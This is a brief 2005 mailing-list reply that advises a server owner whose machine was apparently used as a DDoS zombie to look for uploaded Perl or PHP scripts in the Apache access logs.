Sat, 2005-04-30 at 22:11, a.list.address (AT) gmail (DOT) com wrote:
Looks like someone was trying to use your server as a DDoS zombie.
What kind of Perl or PHP scripts are on your server? Look in your
Apache access log for PST requests that may have uploaded one of
these files, or GET/PST requests that may have uploaded a URL to
download one of these files. See if you can figure out how it got on
your server.